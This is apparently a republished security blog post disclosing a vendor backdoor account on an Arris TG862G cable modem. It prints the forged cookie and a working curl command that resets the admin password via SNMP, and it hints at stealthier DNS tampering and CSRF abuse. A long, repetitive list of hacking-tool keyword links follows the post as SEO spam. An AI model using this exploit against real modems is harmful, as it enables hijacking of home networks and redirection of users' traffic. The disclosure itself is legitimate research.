Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related news

1. Hack App
2. Hacking Tools Online
3. Hacker Security Tools
4. Black Hat Hacker Tools
5. Pentest Reporting Tools
6. Computer Hacker
7. Hacking Tools For Windows Free Download
8. Hacking Tools For Pc
9. Bluetooth Hacking Tools Kali
10. What Are Hacking Tools
11. Termux Hacking Tools 2019
12. Nsa Hack Tools Download
13. Hack Tool Apk No Root
14. Hack Tools
15. Pentest Tools Framework
16. Pentest Tools For Ubuntu
17. Best Hacking Tools 2019
18. Hacker Tools Github
19. Hacker Tool Kit
20. Hacker Tools Windows
21. Hacker Tools 2019
22. Hack Tools For Pc
23. How To Make Hacking Tools
24. How To Hack
25. Hacker Tools Hardware
26. Hacking Tools For Beginners
27. Hack Website Online Tool
28. Top Pentest Tools
29. Pentest Automation Tools
30. Hacker Tool Kit
31. Hack Tools 2019
32. Hacking Tools For Beginners
33. Tools For Hacker
34. Hacker Tools Windows
35. Hacker Tools Hardware
36. Pentest Tools Nmap
37. Hacker Tools Apk Download
38. Hacking Tools Download
39. Hacker Tools Free
40. Hacker
41. Pentest Tools Url Fuzzer
42. Hacker Tools 2020
43. Growth Hacker Tools
44. Nsa Hacker Tools
45. Hacker Search Tools
46. Pentest Tools For Mac
47. Pentest Tools Linux
48. Hacking Tools Windows
49. Black Hat Hacker Tools
50. Hacking Tools And Software
51. Growth Hacker Tools
52. Hacking Tools For Kali Linux
53. Hacker Tools For Ios
54. Hack Tools
55. Hacker Tools
56. Tools 4 Hack
57. Hacking Tools Kit
58. Pentest Tools Online
59. Hacking Tools Mac
60. Best Pentesting Tools 2018
61. Pentest Automation Tools
62. Hak5 Tools
63. Hack Rom Tools
64. Pentest Tools Github
65. Hack Tools Pc
66. Hack Tools For Ubuntu
67. Pentest Tools Website
68. Hacking Tools For Beginners
69. Pentest Tools Kali Linux
70. Beginner Hacker Tools
71. Hacker Tools Apk Download
72. Hack Tools For Windows
73. Hacking Tools Download
74. Hack Website Online Tool
75. Hack And Tools
76. Pentest Tools List
77. Hacker Tools For Windows
78. Top Pentest Tools
79. Hack Website Online Tool
80. Pentest Tools Port Scanner
81. Hacker Tools 2019
82. Pentest Reporting Tools
83. Pentest Tools Bluekeep
84. Hacker Techniques Tools And Incident Handling
85. Pentest Automation Tools
86. Pentest Tools Port Scanner
87. Hack Tools For Pc
88. Pentest Tools For Ubuntu
89. Termux Hacking Tools 2019
90. Hacking Tools For Windows
91. Hacking Tools Windows
92. Blackhat Hacker Tools
93. Hacker Tool Kit
94. Nsa Hack Tools Download
95. Hacking Tools Software
96. Pentest Box Tools Download
97. Kik Hack Tools
98. Hacker
99. Pentest Tools Apk
100. Beginner Hacker Tools
101. Hacking Tools Mac
102. Pentest Tools For Mac
103. Hacker Techniques Tools And Incident Handling
104. How To Hack
105. Pentest Tools Subdomain
106. Pentest Tools Free
107. Pentest Box Tools Download
108. Hacks And Tools
109. Hacking Tools For Pc
110. Hack Tools For Pc
111. Hack Tool Apk No Root
112. Hacker Tools Apk Download
113. Physical Pentest Tools
114. Hack Tools Mac
115. Hacking Tools Windows
116. Android Hack Tools Github
117. Hacker Tools Apk Download
118. Growth Hacker Tools
119. Pentest Tools Apk
120. Pentest Recon Tools
121. Hacking Tools For Windows Free Download
122. Pentest Tools For Windows
123. Hacking Tools For Windows Free Download
124. Pentest Tools
125. Game Hacking
126. Hacking Apps
127. Hack Tools For Mac
128. Usb Pentest Tools
129. Pentest Tools Apk
130. New Hacker Tools
131. Blackhat Hacker Tools
132. Hacking Tools Name
133. Pentest Tools
134. Pentest Tools Find Subdomains
135. Pentest Tools For Windows
136. Hack Tools Github
137. Hacking Tools Online
138. Hacking Apps